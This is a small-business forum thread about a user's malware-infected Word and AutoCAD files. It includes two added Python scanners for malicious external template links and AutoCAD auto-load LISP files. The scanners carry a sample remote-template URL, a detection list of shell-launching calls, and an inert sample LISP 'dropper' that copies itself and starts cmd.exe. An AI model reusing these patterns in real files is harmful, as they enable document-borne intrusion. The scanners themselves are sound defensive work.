Need my cloud scrubbed of malware

estwing

Free Member
Jul 18, 2025
2
0
I always felt guilty about dropping this thread; I lost my login details.

I'm back....Hello!

I still have 60GB of infected files; they sit on a standalone PC that doesn't have Bluetooth or Wi-Fi, it doesn't have the electronic parts inside it to do Bluetooth or Wi-Fi, so it can't spread its nastiness, and I pull the power cord when it's not in use.

I do occasionally need files from it, which I scrub first, then email them to myself via a router with a SIM card in it; this PC is not allowed on my network and thumb drives are a big no.

The main infected files are Word .docs and AutoCAD files; they open up a connection to an IP address, some kind of collaboration thing so a team can all work on a project together. Virus checkers such as McAfee, Bitdefender, etc. see this as normal and don't report it. I don't bother looking for trojans or viruses in other files anymore; I know they are there, I can't do anything about them. Turning off macros and winding all the security settings to maximum didn't stop this from happening.

Once a Word .doc or CAD file had made a connection, a VM would be installed on my machine to run under or alongside Windows; I couldn't see it or find it. From there the PC would be controlled by someone else, with an overlay of Windows installed; it all looked normal to me.

I have been free of all this for over two years now, this was a very expensive, prolonged and traumatic time in my life.
 
Upvote 0

stugster

Free Member
Feb 1, 2007
9,060
2,076
Edinburgh, UK
considerit.com
Not bad! Where are we now?

circa 30 person head count
>£3m turnover
3 floor office in Edinburgh, small satellite offices in London, Glasgow, and Austin, Texas.
Certified to our tits: ISO 27001, ISO 14001, ISO 9001, ISO 22301, ISO 20000-1. CREST Accredited for Penetration Testing and Vulnerability Scanning. NCSC Assured Service Provider, IASME Certifying Body for Cyber Essentials (and Plus).
Certified B-Corp!
 
Upvote 0

KM-Tiger

Free Member
Aug 10, 2003
10,346
1
2,893
Bexley, Kent
circa 30 person head count
>£3m turnover
3 floor office in Edinburgh, small satellite offices in London, Glasgow, and Austin, Texas.
Certified to our tits: ISO 27001, ISO 14001, ISO 9001, ISO 22301, ISO 20000-1. CREST Accredited for Penetration Testing and Vulnerability Scanning. NCSC Assured Service Provider, IASME Certifying Body for Cyber Essentials (and Plus).
Certified B-Corp!
Blimey, well done!

You have come a long way from driving round finding unsecured wireless networks.
 
Upvote 0
I still have 60GB of infected files; they sit on a standalone PC that doesn't have Bluetooth or Wi-Fi, it doesn't have the electronic parts inside it to do Bluetooth or Wi-Fi, so it can't spread its nastiness, and I pull the power cord when it's not in use. [...]

I would say:

  1. Boot the PC under Linux -- I don't think I'm able to post links here - search for something like "Remove Windows viruses using a live Linux USB".
  2. Running Linux, the files can be accessed safely - Linux can read Windows file systems, but there is absolutely no way any Windows cr*p can get executed. So you can safely run virus scan/removal tools.
Looks like I can post links... I found this video https://www.youtube.com/watch?v=Fp86GbNEuKw - looks appropriate from the title, but I haven't actually watched it.
ChatGPT may handle it too, I've not looked.
 
Upvote 0
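Two points in the thread above bear on the same check: estwing's report that the Word documents open a connection to an IP address when opened, and the suggestion here to go through the files from a live Linux system where nothing in them can run. One documented way a .docx can reach out at open time is an external relationship inside the package, for example an attached template whose Target is a URL, which Word fetches when the document loads. The script below is an added example for this thread (not code from any poster or from any tool mentioned here): it walks a directory such as a read-only NTFS mount and lists every external relationship target in OOXML files, marking which ones Office resolves without a click and which point off-host. The mount command in its docstring, the extension list, the sample documents and the 203.0.113.10 address are all constructed for the example.

```python
"""List external relationship targets in OOXML Office files under a directory.
Added example for this thread, not code from any poster. Assumes the Windows
volume is mounted read-only from the live Linux system, e.g.
  sudo mount -t ntfs-3g -o ro,noexec,nosuid,nodev /dev/sdX2 /mnt/win
then run it on /mnt/win/Users (no argument runs the built-in demo)."""
import io, os, sys, tempfile, zipfile
import xml.etree.ElementTree as ET
from typing import NamedTuple
from urllib.parse import urlsplit

REL_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"
OOXML_EXT = (".docx", ".docm", ".dotx", ".dotm", ".xlsx", ".xlsm", ".pptx", ".pptm")
# Resolved at open time with no click; hyperlinks are only followed on click.
AUTO_TYPES = {"attachedTemplate", "oleObject"}
MAX_RELS_BYTES = 1_000_000  # ignore absurdly large .rels parts (XML bombs)

class Ext(NamedTuple):
    part: str      # the .rels part the relationship came from
    reltype: str   # last segment of the Type URI, e.g. attachedTemplate
    target: str
    auto: bool     # resolved when the document is opened
    remote: bool   # points off-host: URL, UNC path, file:// naming a host

def is_remote(target):
    """Word writes local template paths as External too; scheme and host decide."""
    if target.startswith(("\\\\", "//")):
        return True
    u = urlsplit(target)
    return u.scheme in ("http", "https", "ftp") or (
        u.scheme == "file" and u.netloc not in ("", "localhost"))

def external_targets(package):
    """[Ext] for each TargetMode="External" relationship; `package` is a path or
    file-like object. Raises BadZipFile / ParseError on damaged input."""
    found = []
    with zipfile.ZipFile(package) as z:
        for info in z.infolist():
            if not info.filename.endswith(".rels") or info.file_size > MAX_RELS_BYTES:
                continue
            root = ET.fromstring(z.read(info.filename))
            for rel in root.iter(REL_NS + "Relationship"):
                if rel.get("TargetMode", "Internal") != "External":
                    continue
                reltype = rel.get("Type", "").rsplit("/", 1)[-1]
                target = rel.get("Target", "")
                found.append(Ext(info.filename, reltype, target,
                                 reltype in AUTO_TYPES, is_remote(target)))
    return found

def scan_tree(root):
    """Map each OOXML file under `root` that has external targets to its [Ext]."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(OOXML_EXT):
                continue
            path = os.path.join(dirpath, name)
            try:
                hits = external_targets(path)
            except (zipfile.BadZipFile, ET.ParseError, OSError):
                continue  # renamed legacy .doc, damaged, or unreadable: skip it
            if hits:
                report[path] = hits
    return report

# --- constructed samples for a stand-alone run; 203.0.113.10 is TEST-NET-3 ---
_RELS = ('<?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships '
         'xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
         '{}</Relationships>')
_OFFICE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"
_TPL = ('<Relationship Id="rId1" Type="' + _OFFICE + 'attachedTemplate" '
        'Target="{}" TargetMode="External"/>')
REMOTE_TEMPLATE_RELS = _RELS.format(_TPL.format("http://203.0.113.10/proj/team.dotm"))
LOCAL_TEMPLATE_RELS = _RELS.format(_TPL.format("file:///C:/Templates/Normal.dotm"))
CLEAN_RELS = _RELS.format('<Relationship Id="rId1" Type="' + _OFFICE + 'styles" '
                          'Target="styles.xml"/>')

def make_docx(settings_rels):
    """Minimal OOXML-shaped zip in memory carrying the given settings .rels part."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<document/>")
        z.writestr("word/_rels/settings.xml.rels", settings_rels)
    return buf.getvalue()

def demo():
    """Write the samples to a temp tree, scan it, return {relative path: [Ext]}."""
    with tempfile.TemporaryDirectory() as d:
        os.makedirs(os.path.join(d, "Projects", "SiteA"))
        samples = {"Projects/SiteA/brief.docx": REMOTE_TEMPLATE_RELS,
                   "Projects/notes.docx": LOCAL_TEMPLATE_RELS, "Projects/clean.docx": CLEAN_RELS}
        for rel, rels_xml in samples.items():
            with open(os.path.join(d, *rel.split("/")), "wb") as f:
                f.write(make_docx(rels_xml))
        with open(os.path.join(d, "Projects", "old.docx"), "wb") as f:
            f.write(b"\xd0\xcf\x11\xe0 not a zip")  # OLE2 magic: skipped, not a crash
        return {os.path.relpath(p, d).replace(os.sep, "/"): hits
                for p, hits in scan_tree(d).items()}

if __name__ == "__main__":
    results = scan_tree(sys.argv[1]) if len(sys.argv) > 1 else demo()
    for path, hits in sorted(results.items()):
        print(path, *hits, sep="\n  ")
```

The local-template sample is there on purpose: Word records even a C:\ template path as an External relationship, so a scan that only keys on TargetMode would flag every document ever based on a custom template. The scheme and host of the Target are what separate a remote fetch from normal Office behaviour, and the auto flag separates things fetched on open (templates, OLE links) from hyperlinks that need a click.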

gpietersz

Free Member
Sep 10, 2019
2,712
2
705
Northwich, Cheshire
pietersz.net
@Andy Inman your idea is sound, although I would add that you need the right Live CD - it's best if you can find an appropriate one with the right software to remove the malware.

The video you linked to is not helpful. Not only is it about how to keep a Linux system secure, it also gives terrible advice on how to do that!

Upvote 0

fisicx

Moderator
Sep 12, 2006
46,643
8
15,354
Aldershot
www.aerin.co.uk
Probably best overall: take the machine to a local IT company that know their stuff, and pay for the service.
Already been done by numerous experts. Didn't fix the problem.

As the OP said, it seems to be an infected CAD file. But they all pass the malware checks.

Upvote 0
Found https://help.autodesk.com/view/ACD/2026/ENU/?guid=GUID-9C7E997D-28F8-4605-8583-09606610F26D - it appears there's a significant range of potential attack vectors related to AutoCAD.

Examining the file system from a separate OS is a viable approach. Some kind of rootkit may have been installed on the main OS, which could explain why malware scans don't find anything. A separate OS gets around that.

Given the amount of data involved, "beyond economical repair" seems not unlikely.

Upvote 0
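The Autodesk page linked above concerns AutoCAD's handling of executable content. The long-standing drawing-folder mechanism behind that is that AutoCAD auto-loads LISP files with fixed names (acad.lsp, acaddoc.lsp and their compiled .fas/.vlx forms) from its search path, and installations without secure-load restrictions also pick them up from the folder of the drawing being opened; because AutoCAD loads them rather than Windows executing them, an antivirus scan can have nothing to say about them. The script below is an added example for this thread (not from any poster or from Autodesk) to run from the live Linux side against the same read-only mount: it finds auto-load-named files, hashes them so identical copies across project folders stand out, notes whether a drawing sits in the same folder, and runs a small indicator check over LISP source. The name pattern, the indicator strings and the sample files are this example's own assumptions; the sample LISP is inert text.

```python
"""Find AutoCAD auto-load files beside drawings on a mounted volume.
Added example for this thread (not from any poster or from Autodesk). AutoCAD
auto-loads LISP with fixed names (acad.lsp, acaddoc.lsp, compiled .fas/.vlx)
from its search path, and permissive installs also load them from the folder
of the drawing being opened. The name pattern and indicator strings here are
this example's own heuristics. Run:  python3 acad_autoload.py /mnt/win/Projects
"""
import hashlib, os, re, sys, tempfile
from typing import NamedTuple

# acad.lsp, acaddoc.lsp, acad2025.lsp, acad2025doc.lsp, acad.fas, acaddoc.vlx, acad.mnl
AUTOLOAD_NAME = re.compile(r"^acad(\d{4})?(doc)?\.(lsp|fas|vlx|mnl)$", re.I)
DRAWING_EXT = (".dwg", ".dwt", ".dxf")
# Calls a per-drawing LISP file has no business making (heuristic list).
INDICATORS = ("startapp", "vlax-create-object", "wscript.shell",
              '(command "shell"', "vl-file-copy", "vl-file-delete")

class Finding(NamedTuple):
    path: str
    sha256: str
    beside_dwg: bool    # same folder as a drawing: loaded when that drawing opens
    indicators: tuple   # matched INDICATORS; always () for compiled .fas/.vlx

def sha256_of(path):
    """Hash so identical copies across project folders are easy to spot."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()

def lisp_indicators(path):
    """Case-insensitive substring check over LISP source (.lsp/.mnl only)."""
    if not path.lower().endswith((".lsp", ".mnl")):
        return ()
    with open(path, "rb") as f:
        text = f.read(2_000_000).decode("latin-1").lower()
    return tuple(i for i in INDICATORS if i in text)

def scan_tree(root):
    """Return a sorted Finding for every auto-load-named file under `root`."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        has_dwg = any(f.lower().endswith(DRAWING_EXT) for f in files)
        for name in files:
            if not AUTOLOAD_NAME.match(name):
                continue
            path = os.path.join(dirpath, name)
            try:
                findings.append(Finding(path, sha256_of(path), has_dwg, lisp_indicators(path)))
            except OSError:
                continue  # unreadable (NTFS ACLs, I/O error): skip it
    return sorted(findings)

# --- constructed samples; the LISP is inert text, not working malware ---
DROPPER_LSP = (b'(vl-load-com)\r\n(setq src (findfile "acad.fas"))\r\n'
               b'(vl-file-copy src (strcat (getvar "DWGPREFIX") "acad.fas"))\r\n'
               b'(startapp "cmd.exe" "/c whoami")\r\n')
BENIGN_LSP = b'(defun c:hello () (princ "\\nHello from acad.lsp"))\r\n(princ)\r\n'

def demo():
    """Build a temp tree, scan it, return [(relative path, beside_dwg, indicators)]."""
    with tempfile.TemporaryDirectory() as d:
        proj = os.path.join(d, "Projects", "Site7")
        support = os.path.join(d, "Support")
        os.makedirs(proj)
        os.makedirs(support)
        files = {os.path.join(proj, "Site7.dwg"): b"AC1032" + b"\0" * 64,  # fake DWG header
                 os.path.join(proj, "acaddoc.lsp"): DROPPER_LSP,
                 os.path.join(proj, "acad.fas"): b"\xfa\x01compiled-opaque",
                 os.path.join(support, "acad.lsp"): BENIGN_LSP,
                 os.path.join(d, "Projects", "acadiso.lsp"): BENIGN_LSP}  # not an auto-load name
        for path, data in files.items():
            with open(path, "wb") as f:
                f.write(data)
        return [(os.path.relpath(f.path, d).replace(os.sep, "/"), f.beside_dwg, f.indicators)
                for f in scan_tree(d)]

if __name__ == "__main__":
    rows = scan_tree(sys.argv[1]) if len(sys.argv) > 1 else demo()
    for row in rows:
        print(*row, sep="  ")
```

Compiled .fas/.vlx files cannot be read this way, which is why the hash matters: the same opaque acad.fas turning up next to drawings in many unrelated project folders is itself the signal, and the hash lets those copies be tied to one another and to whatever a full scan from the live system reports.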
